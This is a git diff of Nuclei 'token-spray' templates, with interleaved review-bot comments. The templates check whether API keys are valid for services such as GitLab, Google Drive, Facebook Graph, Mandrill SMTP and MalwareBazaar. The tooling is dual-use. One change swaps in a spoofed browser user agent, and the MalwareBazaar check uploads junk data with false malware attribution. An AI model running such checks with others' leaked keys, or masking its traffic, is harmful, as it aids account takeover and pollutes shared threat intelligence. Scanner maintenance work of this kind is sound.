@@ -1,15 +1,18 @@ id: api-front info: - name: LaunchDarkly REST API + name: Frontapp API author: Luqmaan Hadia [Luqiih](https://github.com/Luqiih) severity: info reference: - https://dev.frontapp.com/reference/introduction + metadata: + max-request: 1 tags: token-spray,front self-contained: true -requests: + +http: - raw: - | GET https://api2.frontapp.com/accounts HTTP/1.1 @@ -25,3 +28,4 @@ requests: - "logo_url" - "name" condition: and +# digest: 4a0a00473045022100d003ae0a231bd7e86985f76bc2c2581074be0f33292b5439a4f8f0887390294f022028fd40121608b7c00d86016b41e921dda76af70a57e5350b3a39561ca374399c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/api-giphy.yaml b/nuclei-templates/Other/api-giphy.yaml index 267f072da9..a1a50b08a1 100644 --- a/nuclei-templates/Other/api-giphy.yaml +++ b/nuclei-templates/Other/api-giphy.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://developers.giphy.com/branch/master/docs/api/ + metadata: + max-request: 1 tags: token-spray,giphy self-contained: true -requests: + +http: - method: GET path: - "https://api.giphy.com/v1/gifs/trending?api_key={{token}}" @@ -21,3 +24,5 @@ requests: - '"data":' - '"type":"gif"' condition: and + +# digest: 4a0a00473045022051fe11abec83d39e1b46bf34dddc016f79854abaf533ebd2014ea533ae2e3e7f022100a57f14d370356c978b0a538885575eeb0e54145624030058007430f18a47af9a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-gitlab-431.yaml b/nuclei-templates/Other/api-gitlab-431.yaml index 8372a3c8a0..40aa5ddf2f 100644 --- a/nuclei-templates/Other/api-gitlab-431.yaml +++ b/nuclei-templates/Other/api-gitlab-431.yaml @@ -3,9 +3,8 @@ id: api-gitlab info: name: Gitlab API Test author: Adam Crosser + reference: https://docs.gitlab.com/ee/api/personal_access_tokens.html severity: info - reference: - - https://docs.gitlab.com/ee/api/personal_access_tokens.html tags: token-spray,gitlab self-contained: true 
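Review bot: The `# digest:` line appended to api-front.yaml in the second hunk is added directly after `condition: and` with no separating blank line and without a trailing newline (`\ No newline at end of file`), whereas every other template in this commit adds an empty `+` line before `+# digest: …` and ends the file with a newline. Insert the empty line before the digest and terminate the file so the signature block looks the same across the set. The body of the template between the two hunks is outside this view.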
@@ -17,9 +16,6 @@ requests: PRIVATE-TOKEN: "{{token}}" matchers: - - type: word - part: body - words: - - '"id":' - - '"created_at":' - condition: and + - type: status + status: + - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/api-google-drive-432.yaml b/nuclei-templates/Other/api-google-drive-432.yaml new file mode 100644 index 0000000000..f66896d7c3 --- /dev/null +++ b/nuclei-templates/Other/api-google-drive-432.yaml @@ -0,0 +1,28 @@ +id: api-google-drive + +info: + name: Google Drive API Test + author: geeknik + severity: info + reference: + - https://developers.google.com/drive/api/guides/about-sdk + metadata: + max-request: 1 + tags: token-spray,google,drive,intrusive + +self-contained: true + +http: + - raw: + - | + GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 + Referer: {{referer}} + Content-Type:application/json + + matchers: + - type: word + part: body + words: + - 'File not found: {{randstr}}.txt.' + +# digest: 4b0a00483046022100f3d2e430755236cb5354472588b85c1caa009551fffb628d51c8321a8c900fd3022100c756303eff99e074d92d5f4b223322b94572b1515b741fee9473fa14cc0984ef:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-google-drive.yaml b/nuclei-templates/Other/api-google-drive.yaml deleted file mode 100644 index b274fd83c5..0000000000 --- a/nuclei-templates/Other/api-google-drive.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-google-drive - -info: - name: Google Drive API Test - author: geeknik - severity: info - reference: - - https://developers.google.com/drive/api/guides/about-sdk - tags: token-spray,google,drive - -self-contained: true -requests: - - raw: - - | - GET https://www.googleapis.com/drive/v3/files/{{randstr}}.txt/%3fkey={{token}}&supportsAllDrives=true HTTP/1.1 - Referer: {{BaseURL}} - Content-Type:application/json - - matchers: - - type: word - part: body - words: - - 'File not found: {{randstr}}.txt.' 
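Review bot: Replacing the body word matcher with a bare `status: 200` check makes any 200 response count as a valid GitLab token, including an HTML landing page or a proxy that answers 200 for everything, so false positives in token-spray output go up. The request line and path are above this hunk and not visible here; if the endpoint is the `personal_access_tokens` one the reference names, the old `'"id":'` and `'"created_at":'` body words were the discriminating signal. Keep the status check but restore the body match under `matchers-condition: and`, e.g. `- type: word` / `part: body` / `words: ['"id":', '"created_at":']` with `condition: and`.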
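Review bot: `Referer: {{referer}}` introduces a variable this template never defines, so unless the operator passes `-var referer=...` the placeholder stays unresolved and nuclei will, depending on version, skip the request or send the text literally. Google API keys can be restricted by HTTP referrer, so this is probably the intent, but nothing in the file says so; add a `variables:` default or a comment under `info:` such as `# pass -var referer=<allowed origin> for keys with HTTP-referrer restrictions`. The `intrusive` tag is added here although the request only reads a random non-existent file; if it was added because the call consumes the key's quota, a short comment saying so would stop the next maintainer from removing it.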
diff --git a/nuclei-templates/Other/api-gorest.yaml b/nuclei-templates/Other/api-gorest.yaml index 7bb3131a2c..2b0c71e77c 100644 --- a/nuclei-templates/Other/api-gorest.yaml +++ b/nuclei-templates/Other/api-gorest.yaml @@ -8,10 +8,13 @@ info: reference: - https://gorest.co.in/ - https://github.com/daffainfo/all-about-apikey/tree/main/gorest + metadata: + max-request: 1 tags: token-spray,gorest self-contained: true -requests: + +http: - raw: - | GET https://gorest.co.in/public/v2/users HTTP/1.1 @@ -31,3 +34,5 @@ requests: part: body words: - '"name"' + +# digest: 490a00463044022040eda067fe56f4bacd7b6a7473cca2316a8716dbfb4c203a54abcb9594345e7d022001099a015686ece5d2d4fe1c587b09407c5c453732b04bb07a4b50aae452e49f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-harvardart-433.yaml b/nuclei-templates/Other/api-harvardart-433.yaml new file mode 100644 index 0000000000..e9f965433e --- /dev/null +++ b/nuclei-templates/Other/api-harvardart-433.yaml @@ -0,0 +1,25 @@ +id: api-harvardart + +info: + name: Harvard Art Museums API Test + author: daffainfo + severity: info + reference: + - https://github.com/harvardartmuseums/api-docs + - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Harvard%20Art%20Museums.md + tags: token-spray,harvardart + +self-contained: true +requests: + - method: GET + path: + - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" + + matchers: + - type: word + part: body + words: + - '"colorid"' + - '"name"' + - '"hex"' + condition: and diff --git a/nuclei-templates/Other/api-harvardart-434.yaml b/nuclei-templates/Other/api-harvardart-434.yaml deleted file mode 100644 index 7b2f15b76f..0000000000 --- a/nuclei-templates/Other/api-harvardart-434.yaml +++ /dev/null 
@@ -1,25 +0,0 @@ -id: api-harvardart - -info: - name: Harvard Art Museums API Test - author: daffainfo - severity: info - reference: - - https://github.com/harvardartmuseums/api-docs - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Harvard%20Art%20Museums.md - tags: token-spray,harvardart - -self-contained: true -requests: - - method: GET - path: - - "https://api.harvardartmuseums.org/color/34838442?apikey={{token}}" - - matchers: - - type: word - part: body - words: - - '"colorid"' - - '"name"' - - '"hex"' - condition: and diff --git a/nuclei-templates/Other/api-heroku-435.yaml b/nuclei-templates/Other/api-heroku.yaml similarity index 100% rename from nuclei-templates/Other/api-heroku-435.yaml rename to nuclei-templates/Other/api-heroku.yaml diff --git a/nuclei-templates/Other/api-hirak-rates-436.yaml b/nuclei-templates/Other/api-hirak-rates-436.yaml new file mode 100644 index 0000000000..0557cf59fe --- /dev/null +++ b/nuclei-templates/Other/api-hirak-rates-436.yaml @@ -0,0 +1,32 @@ +id: api-hirak-rates + +info: + name: Hirak Exchange Rates API Test + author: daffainfo + severity: info + description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits + reference: + - https://rates.hirak.site/ + - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates + metadata: + max-request: 1 + tags: token-spray,hirak + +self-contained: true + +http: + - method: GET + path: + - "https://rates.hirak.site/stat/?token={{token}}" + + matchers: + - type: word + part: body + words: + - '"token":' + - '"plan":' + - '"hits":' + - '"remain":' + condition: and + +# digest: 4b0a00483046022100feb1b70cc116a0e5e28e60351b93907f2994f9f53d4f5ce7337bd1e5581d1f95022100932bf3b672f01049a27014ca2bac8996fb16ac2f4ab829bdf96a780ecd3620ec:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-hirak-rates.yaml b/nuclei-templates/Other/api-hirak-rates.yaml deleted file mode 100644 index 6d61403334..0000000000 --- a/nuclei-templates/Other/api-hirak-rates.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-hirak-rates - -info: - name: Hirak Exchange Rates API Test - author: daffainfo - severity: info - description: Exchange rates between 162 currency & 300 crypto currency update each 5 min, accurate, no limits - reference: - - https://rates.hirak.site/ - - https://github.com/daffainfo/all-about-apikey/tree/main/hirak-exchange-rates - tags: token-spray,hirak - -self-contained: true -requests: - - method: GET - path: - - "https://rates.hirak.site/stat/?token={{token}}" - - matchers: - - type: word - part: body - words: - - '"token":' - - '"plan":' - - '"hits":' - - '"remain":' - condition: and diff --git a/nuclei-templates/Other/api-host-io.yaml b/nuclei-templates/Other/api-host-io.yaml index bd0ca1f244..5b39b56409 100644 --- a/nuclei-templates/Other/api-host-io.yaml +++ b/nuclei-templates/Other/api-host-io.yaml @@ -8,10 +8,13 @@ info: reference: - https://host.io/docs - https://github.com/daffainfo/all-about-apikey/tree/main/host-io + metadata: + max-request: 1 tags: token-spray,hostio self-contained: true -requests: + +http: - method: GET path: - "https://host.io/api/full/facebook.com?token=${{token}}" @@ -24,3 +27,5 @@ requests: - '"rank"' - '"url"' condition: and + +# digest: 4a0a00473045022051b89a5ecf5fa4e1b0a390e98ab6474c71ee8eb9c02a2d2878d8e4b8d1578639022100ef96ddd2bec41d4ab8cd0f90116e2778bb9f6b70f0ba04038f9ba19a30987c77:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-html2pdf.yaml b/nuclei-templates/Other/api-html2pdf.yaml index b228ecff8b..ce840690c1 100644 --- a/nuclei-templates/Other/api-html2pdf.yaml +++ b/nuclei-templates/Other/api-html2pdf.yaml 
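Review bot: The host.io path `?token=${{token}}` still carries a stray `$` before the placeholder, so the value sent is `$<token>` rather than the token and a valid key would be reported as invalid; the line is unchanged context, but the migration to `http:` was the moment to fix it. Unless host.io documents a `$` prefix (the linked docs are not visible here), change it to `- "https://host.io/api/full/facebook.com?token={{token}}"`.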
@@ -8,10 +8,13 @@ info: reference: - https://html2pdf.app/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/html2pdf + metadata: + max-request: 1 tags: token-spray,html2pdf self-contained: true -requests: + +http: - method: GET path: - "https://api.html2pdf.app/v1/generate?url=https://test.test&apiKey={{token}}" @@ -21,3 +24,5 @@ requests: part: body words: - '"Provided url is not accessible"' + +# digest: 4a0a00473045022100e664a2495d01c2b28fbfbb18ec076eadfabcd6794738c1aee20f055611adaf4402207e7a6222c3d4b19c780a81dfc5245377a5d4dfa5eaecd8f5a5e92b99b86d52b6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-hubspot-437.yaml b/nuclei-templates/Other/api-hubspot-437.yaml deleted file mode 100644 index 86566864f0..0000000000 --- a/nuclei-templates/Other/api-hubspot-437.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: api-hubspot - -info: - name: HubSpot API Test - author: zzeitlin - reference: https://legacydocs.hubspot.com/docs/methods/owners/get_owners - severity: info - tags: token-spray,hubspot - -requests: - - method: GET - path: - - "https://api.hubapi.com/owners/v2/owners?hapikey={{token}}" - - "https://api.hubapi.com/contacts/v1/lists/all/contacts/all?hapikey={{token}}" - - matchers: - - type: word - part: body - words: - - 'error' - negative: true diff --git a/nuclei-templates/Other/api-hunter.yaml b/nuclei-templates/Other/api-hunter.yaml index 429485a134..ec4d4092a2 100644 --- a/nuclei-templates/Other/api-hunter.yaml +++ b/nuclei-templates/Other/api-hunter.yaml @@ -8,10 +8,13 @@ info: reference: - https://hunter.io/api-documentation/v2 - https://github.com/daffainfo/all-about-apikey/tree/main/hunter + metadata: + max-request: 1 tags: token-spray,hunter self-contained: true -requests: + +http: - method: GET path: - "https://api.hunter.io/v2/domain-search?domain=stripe.com&api_key={{token}}" 
@@ -24,3 +27,5 @@ requests: - '"disposable"' - '"webmail"' condition: and + +# digest: 4a0a004730450221008df0a72b01ce46d5d589570d82170497333f56f9af3175914b5a8c36c129881f022060f8f9a962d71e85258f02bb50c8af278e7c4959d5afb1f1c155366ffdc1e6d6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-iconfinder.yaml b/nuclei-templates/Other/api-iconfinder-438.yaml similarity index 100% rename from nuclei-templates/Other/api-iconfinder.yaml rename to nuclei-templates/Other/api-iconfinder-438.yaml diff --git a/nuclei-templates/Other/api-improvmx-440.yaml b/nuclei-templates/Other/api-improvmx-440.yaml new file mode 100644 index 0000000000..1b6f7e7986 --- /dev/null +++ b/nuclei-templates/Other/api-improvmx-440.yaml @@ -0,0 +1,29 @@ +id: api-improvmx + +info: + name: ImprovMX API Test + author: daffainfo + severity: info + reference: + - https://improvmx.com/api + - https://github.com/daffainfo/all-about-apikey/blob/main/Business/ImprovMX.md + tags: token-spray,improvmx + +self-contained: true +requests: + - raw: + - | + GET https://api.improvmx.com/v3/account HTTP/1.1 + Authorization: Basic {{base64(':' + token)}} + Host: api.improvmx.com + + redirects: true + max-redirects: 1 + matchers: + - type: word + part: body + words: + - '"billing_email":' + - '"cancels_on":' + - '"company_details":' + condition: and diff --git a/nuclei-templates/Other/api-improvmx.yaml b/nuclei-templates/Other/api-improvmx.yaml deleted file mode 100644 index fb6c00f0d9..0000000000 --- a/nuclei-templates/Other/api-improvmx.yaml +++ /dev/null 
@@ -1,30 +0,0 @@ -id: api-improvmx - -info: - name: ImprovMX API Test - author: daffainfo - severity: info - description: API for free email forwarding service - reference: - - https://improvmx.com/api - - https://github.com/daffainfo/all-about-apikey/tree/main/improvmx - tags: token-spray,improvmx - -self-contained: true -requests: - - raw: - - | - GET https://api.improvmx.com/v3/account HTTP/1.1 - Authorization: Basic {{base64(':' + token)}} - Host: api.improvmx.com - - redirects: true - max-redirects: 1 - matchers: - - type: word - part: body - words: - - '"billing_email":' - - '"cancels_on":' - - '"company_details":' - condition: and diff --git a/nuclei-templates/Other/api-instagram.yaml b/nuclei-templates/Other/api-instagram.yaml index 289546f452..fc463c8bac 100644 --- a/nuclei-templates/Other/api-instagram.yaml +++ b/nuclei-templates/Other/api-instagram.yaml @@ -7,12 +7,17 @@ info: severity: info tags: token-spray,instagram,graph +self-contained: true requests: - method: GET path: - - "https://graph.facebook.com/v8.0/me/accounts?access_token={{token}}" + - "https://graph.facebook.com/v12.0/me/accounts?access_token={{token}}" matchers: - - type: status - status: - - 200 + - type: word + part: body + words: + - '"data":' + - '"access_token":' + - '"name":' + condition: and diff --git a/nuclei-templates/Other/api-intelx.yaml b/nuclei-templates/Other/api-intelx.yaml index 609237bf4a..d2d1c1f278 100644 --- a/nuclei-templates/Other/api-intelx.yaml +++ b/nuclei-templates/Other/api-intelx.yaml 
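Review bot: This template is the only one in the batch left on the legacy `requests:` key without `metadata:` / `max-request: 1` and without a signed digest, while its siblings in the same commit were migrated to `http:`; change `requests:` to `http:` and add the metadata under `info:` for consistency. Adding `self-contained: true` and replacing the bare 200 check with body words is a clear improvement. Note that the matcher's own `'"access_token":'` word shows the `/me/accounts` response body carries further tokens, so the raw output of this template should be treated as credential material, which is worth a line in `description:`.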
@@ -11,17 +11,20 @@ info: - https://github.com/IntelligenceX/SDK - https://github.com/IntelligenceX/SDK/blob/master/Intelligence%20X%20API.pdf - https://intelx.io/account?tab=developer - tags: dns,scan,recon,intelx,token-spray + metadata: + max-request: 1 + tags: scan,recon,intelx,token-spray self-contained: true -requests: + +http: - method: GET path: - https://2.intelx.io/authenticate/info + headers: X-Key: "{{token}}" - User-Agent: Nuclei (+https://nuclei.projectdiscovery.io) - + User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 matchers: - type: word part: body @@ -30,3 +33,5 @@ requests: - 'preview' - 'buckets' condition: and + +# digest: 4b0a00483046022100a25b478d01643eccbc7698fb31b49e70c3e281e3621335b3577262c1739b0206022100bb3320c63858860cdf12227f16471c33cf772af238025a964d61cb090093a538:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-intercom.yaml b/nuclei-templates/Other/api-intercom-443.yaml similarity index 100% rename from nuclei-templates/Other/api-intercom.yaml rename to nuclei-templates/Other/api-intercom-443.yaml diff --git a/nuclei-templates/Other/api-ip2whois.yaml b/nuclei-templates/Other/api-ip2whois.yaml index 8103ce599f..bf52fee356 100644 --- a/nuclei-templates/Other/api-ip2whois.yaml +++ b/nuclei-templates/Other/api-ip2whois.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.ip2whois.com/developers-api - https://github.com/daffainfo/all-about-apikey/tree/main/ip2whois + metadata: + max-request: 1 tags: token-spray,ip2whois self-contained: true -requests: + +http: - method: GET path: - "https://api.ip2whois.com/v2?key={{token}}&domain=daffa.tech&format=json" @@ -24,3 +27,5 @@ requests: - '"domain_id"' - '"whois_server"' condition: and + +# digest: 4a0a00473045022100d0b5c1901b529cae5c21960db2b447cc4b87f47e649a170ecf2a66efbfef920102203a03c1d223bee1fe226f02b307991f4039eef57fd9338723061409d79492449a:922c64590222798bb761d5b6d8e72950 
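Review bot: The User-Agent is switched from the self-identifying Nuclei string to a Chrome 49 UA with no explanation, which hides the scanner's origin from intelx.io logs and may be deliberate (UA filtering) or accidental. Record the reason in a comment above the header, e.g. `# intelx rejects non-browser user agents — TODO confirm`, and if it is not actually needed revert to the standard UA so the traffic stays attributable. Dropping the `dns` tag looks right since the request is a plain HTTPS call.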
diff --git a/nuclei-templates/Other/api-ipdata.yaml b/nuclei-templates/Other/api-ipdata.yaml index 55dcd7a70d..8f2dce3208 100644 --- a/nuclei-templates/Other/api-ipdata.yaml +++ b/nuclei-templates/Other/api-ipdata.yaml @@ -2,27 +2,31 @@ id: api-ipdata info: name: IP Data API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://docs.ipdata.co/docs metadata: verified: true + max-request: 1 tags: token-spray,ipdata self-contained: true -requests: + +http: - method: GET path: - "https://api.ipdata.co/?api-key={{token}}" + matchers: - type: word part: body words: - - '"ip"' - - '"name"' - - '"asn"' - - '"route"' - - '"time_zone"' - - '"carrier"' + - '"ip":' + - '"name":' + - '"asn":' + - '"route":' + - '"time_zone":' condition: and + +# digest: 4b0a004830460221008dbcb92492cacfbe35ca123e5351a5d6861aa4bc5c6bdc55dc3f7a9affb4c455022100ceeced862a8f0bf4ed0bd80cd2a647f755a164709bddb57c22d57b6936ac00f1:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-ipfind.yaml b/nuclei-templates/Other/api-ipfind.yaml index 38aef171e0..3e579d872f 100644 --- a/nuclei-templates/Other/api-ipfind.yaml +++ b/nuclei-templates/Other/api-ipfind.yaml @@ -8,10 +8,13 @@ info: reference: - https://ipfind.io/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/ipfind + metadata: + max-request: 1 tags: token-spray,ipfind self-contained: true -requests: + +http: - method: GET path: - "https://app.ipfind.io/api/iplocation?apikey={{token}}" @@ -24,3 +27,5 @@ requests: - '"country"' - '"zipCode"' condition: and + +# digest: 4a0a00473045022020e6556a176e56998b68e20b96015498f33100337c1b19c241c409fdb73e9d4b022100a0e9205b8204ee06f6a6b1c2cfdd4b6f5b3bfb09d8f8eb937047a8a0bf75d992:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-ipinfo.yaml b/nuclei-templates/Other/api-ipinfo.yaml index e6bbfe06a2..e35421b364 100644 --- a/nuclei-templates/Other/api-ipinfo.yaml +++ b/nuclei-templates/Other/api-ipinfo.yaml 
@@ -2,19 +2,22 @@ id: api-ipinfo info: name: IPinfo API Test - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://ipinfo.io/developers metadata: verified: true + max-request: 1 tags: token-spray,ipinfo self-contained: true -requests: + +http: - method: GET path: - "https://ipinfo.io/?token={{token}}" + matchers: - type: word part: body @@ -25,3 +28,5 @@ requests: - '"postal"' - '"timezone"' condition: and + +# digest: 4a0a0047304502200647299d72ad3fcb1497c7b0efe83036e61985b6a2fa6fe93120f036ce314ef0022100d0474e331fa94254842c0fc6122d3350c4401cd0331ca25fd01cd59613faa6c6:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-ipstack-444.yaml b/nuclei-templates/Other/api-ipstack-444.yaml new file mode 100644 index 0000000000..9fbe1ff033 --- /dev/null +++ b/nuclei-templates/Other/api-ipstack-444.yaml @@ -0,0 +1,17 @@ +id: api-ipstack +info: + name: IPStack API Test + author: zzeitlin + reference: https://ipstack.com/documentation + severity: info + tags: token-spray,ipstack +requests: + - method: GET + path: + - "https://api.ipstack.com/8.8.8.8?access_key={{token}}" + matchers: + - type: word + part: body + negative: true + words: + - 'invalid_access_key' diff --git a/nuclei-templates/Other/api-jsonbin.yaml b/nuclei-templates/Other/api-jsonbin.yaml index 2a14309c8b..5108391403 100644 --- a/nuclei-templates/Other/api-jsonbin.yaml +++ b/nuclei-templates/Other/api-jsonbin.yaml @@ -8,10 +8,13 @@ info: reference: - https://jsonbin.io/api-reference - https://github.com/daffainfo/all-about-apikey/tree/main/jsonbin + metadata: + max-request: 1 tags: token-spray,jsonbin self-contained: true -requests: + +http: - raw: - | GET https://api.jsonbin.io/v3/c HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"collectionMeta"' - '"schemaDocId"' condition: and + +# digest: 4b0a00483046022100bc4de040545f2f307109a5025e97dd781138d16fe63344619dc86a1944687373022100f88b592d6b5098cca487c8e90941f091a7289cdbe67121bd7c1f1ff535ef75f7:922c64590222798bb761d5b6d8e72950 
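Review bot: The only matcher in api-ipstack-444.yaml is `negative: true` on `invalid_access_key`, so any response that lacks that string — a quota or rate-limit error, a 5xx, an HTML block page, or `missing_access_key` — is reported as a working key. Match on a positive field of a successful lookup instead, e.g. `words: ['"ip":', '"country_code":']` with `condition: and`, or at least pair the negative check with `- type: status` / `status: [200]` under `matchers-condition: and`. The file also lacks `self-contained: true`, unlike the other token-spray templates in this commit, so it appears to need an input target even though its URL is absolute.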
diff --git a/nuclei-templates/Other/jumpcloud.yaml b/nuclei-templates/Other/api-jumpcloud.yaml similarity index 100% rename from nuclei-templates/Other/jumpcloud.yaml rename to nuclei-templates/Other/api-jumpcloud.yaml diff --git a/nuclei-templates/Other/api-launchdarkly-449.yaml b/nuclei-templates/Other/api-launchdarkly-449.yaml index 194203017c..5490750be5 100644 --- a/nuclei-templates/Other/api-launchdarkly-449.yaml +++ b/nuclei-templates/Other/api-launchdarkly-449.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://apidocs.launchdarkly.com/ + metadata: + max-request: 1 tags: token-spray,launchdarkly self-contained: true -requests: + +http: - raw: - | GET https://app.launchdarkly.com/api/v2/members HTTP/1.1 @@ -27,3 +30,5 @@ requests: - '"totalCount":' - '"items":' condition: and + +# digest: 4a0a00473045022059ba18b8d17fc3603d02f111b48fdc488776904846a5a670916ef5910158d0f30221008808cf1122a8d79312a459b7a53df6bb553bb4c9419cc2d5dea3ae9ef558b51e:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-leanix.yaml b/nuclei-templates/Other/api-leanix-450.yaml similarity index 100% rename from nuclei-templates/Other/api-leanix.yaml rename to nuclei-templates/Other/api-leanix-450.yaml diff --git a/nuclei-templates/Other/api-lob.yaml b/nuclei-templates/Other/api-lob.yaml index acdb6a64d8..84a6e8051e 100644 --- a/nuclei-templates/Other/api-lob.yaml +++ b/nuclei-templates/Other/api-lob.yaml @@ -8,10 +8,13 @@ info: reference: - https://docs.lob.com/ - https://github.com/daffainfo/all-about-apikey/tree/main/lob + metadata: + max-request: 1 tags: token-spray,lob self-contained: true -requests: + +http: - raw: - | GET https://api.lob.com/v1/addresses HTTP/1.1 
@@ -25,4 +28,6 @@ requests: - '"id"' - '"description"' - '"name"' - condition: and \ No newline at end of file + condition: and + +# digest: 490a004630440220718f49d6c4df40b412ede0b5cb39f6cdb82f0af3dd0b78300c3691a2e79c729f0220739f62fadcce15febe9ddeb29a395d56bca04cb30becd76c180499854fdec7b3:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-lokalise.yaml b/nuclei-templates/Other/api-lokalise-452.yaml similarity index 100% rename from nuclei-templates/Other/api-lokalise.yaml rename to nuclei-templates/Other/api-lokalise-452.yaml diff --git a/nuclei-templates/Other/api-mac-address-lookup.yaml b/nuclei-templates/Other/api-mac-address-lookup.yaml index aa2f53074c..ba17df24c8 100644 --- a/nuclei-templates/Other/api-mac-address-lookup.yaml +++ b/nuclei-templates/Other/api-mac-address-lookup.yaml @@ -8,10 +8,13 @@ info: reference: - https://macaddress.io/api - https://github.com/daffainfo/all-about-apikey/tree/main/mac-address-lookup + metadata: + max-request: 1 tags: token-spray,macaddresslookup self-contained: true -requests: + +http: - method: GET path: - "https://api.macaddress.io/v1?apiKey={{token}}&output=json&search=44:38:39:ff:ef:57" @@ -24,3 +27,5 @@ requests: - '"companyName"' - '"companyAddress"' condition: and + +# digest: 490a00463044022077f9c79db05e4de64f4145cc0e554af042df0423c199825f3d6ec8cfc5951c2a022063e9ebc8dfa585d7c79d251563fb852897b8c1696eb495158a519eac7dbcbf83:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-mailchimp.yaml b/nuclei-templates/Other/api-mailchimp.yaml deleted file mode 100644 index 9d7073e46c..0000000000 --- a/nuclei-templates/Other/api-mailchimp.yaml +++ /dev/null 
@@ -1,20 +0,0 @@ -id: api-mailchimp - -info: - name: Mailchimp API Test - author: zzeitlin - reference: https://mailchimp.com/developer/transactional/docs/smtp-integration/#credentials-and-configuration - severity: info - tags: token-spray,mailchimp - -network: - - inputs: - - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" - read: 1024 - host: - - "tls://smtp.mandrillapp.com:465" - - matchers: - - type: word - words: - - "success" diff --git a/nuclei-templates/Other/api-malshare-457.yaml b/nuclei-templates/Other/api-malshare.yaml similarity index 100% rename from nuclei-templates/Other/api-malshare-457.yaml rename to nuclei-templates/Other/api-malshare.yaml diff --git a/nuclei-templates/Other/api-malwarebazaar-458.yaml b/nuclei-templates/Other/api-malwarebazaar-458.yaml new file mode 100644 index 0000000000..ce99bd0a43 --- /dev/null +++ b/nuclei-templates/Other/api-malwarebazaar-458.yaml 
@@ -0,0 +1,40 @@ +id: api-malwarebazaar + +info: + name: MalwareBazaar API Test + author: daffainfo + severity: info + reference: + - https://bazaar.abuse.ch/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/MalwareBazaar.md + tags: token-spray,malwarebazaar + +self-contained: true +requests: + - raw: + - | + POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 + Host: mb-api.abuse.ch + API-KEY: {{token}} + Content-Length: 0 + Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 + + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="json_data" + Content-Type: application/json + + {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} + --545d0ca717a743c3bd4fa575585f74c6 + Content-Disposition: form-data; name="file"; filename="1.txt" + + dssd + + --545d0ca717a743c3bd4fa575585f74c6-- + + matchers: + - type: word + part: body + words: + - '"query_status": "inserted"' + - '"query_status": "file_already_known"' + condition: or diff --git a/nuclei-templates/Other/api-malwarebazaar.yaml b/nuclei-templates/Other/api-malwarebazaar.yaml deleted file mode 100644 index f261796b92..0000000000 --- a/nuclei-templates/Other/api-malwarebazaar.yaml +++ /dev/null 
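Review bot: This token check is a write, not a read: the `POST https://mb-api.abuse.ch/api/v1` uploads a 4-byte file named `1.txt` together with fabricated metadata (`"dropped_by_malware": ["Gozi"]`, made-up sandbox and malpedia references, `"anonymous": 1`), so every spray run submits junk and false attribution into a shared threat-intel database under the token owner's account. Validate the key with a read-only call instead — for example a `get_taginfo` or `get_info` query if MalwareBazaar accepts the key there — and match on `"query_status": "ok"`; if a submission really is the only authenticated call, tag the template `intrusive` as the commit already does for api-google-drive and say so in `description:`. Separately, `Content-Length: 0` is sent with a non-empty multipart body; nuclei recomputes it for non-`unsafe` raw requests as far as I know, but the header is misleading and should be dropped.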
